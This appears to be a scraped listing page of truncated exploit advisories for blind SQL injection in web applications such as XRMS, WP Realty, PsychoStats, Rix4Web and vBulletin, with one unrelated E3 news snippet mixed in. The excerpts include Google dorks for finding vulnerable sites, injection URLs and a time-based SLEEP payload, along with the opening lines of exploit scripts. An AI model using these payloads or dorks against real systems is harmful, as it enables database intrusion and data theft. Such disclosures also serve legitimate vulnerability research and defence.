XRMS Blind SQL Injection / Command Execution

28 August 2014 - Source: http://www.mondounix.com
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
  ...


Microsoft: E3 2014 conference

9 June 2014 - Source: http://www.outofbit.it

Microsoft has officially opened the new edition of the mammoth “E3” trade show held in Los Angeles.

The conference immediately showcased the titles with the greatest media appeal, presenting a trailer for the new Activision game called “Call of Duty: Advanced Warfare”. The new chapter of the saga will use a new...


WordPress WP Realty Blind SQL Injection

28 October 2013 - Source: http://www.mondounix.com
$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits...


mod_accounting 0.5 Blind SQL Injection

29 September 2013 - Source: http://www.mondounix.com
   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received...


Joomla JVideoClip Blind SQL Injection

24 September 2013 - Source: http://www.mondounix.com
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind...


PsychoStats 3.2.2b Blind SQL Injection

29 March 2013 - Source: http://www.mondounix.com
Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end
...


Rix4Web Portal Remote Blind SQL Injection

24 February 2013 - Source: http://www.mondounix.com
################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
#...


Zenphoto 1.4.4.1 Blind SQL Injection

21 February 2013 - Source: http://www.mondounix.com
######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org     ...


Paypal.com Blind SQL Injection

23 January 2013 - Source: http://www.mondounix.com
Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability
 
 
Date:
=====
2013-01-22
 
 
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
 
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml
 
 
VL-ID:
=====
673
 
 
Common Vulnerability Scoring System:
====================================
8.3
 
 
Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money...


vBulletin 3.x / 4.x AjaxReg SQL Injection

10 December 2012 - Source: http://www.mondounix.com
#!/usr/bin/php
<?
 
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
 
function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
        "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname>...
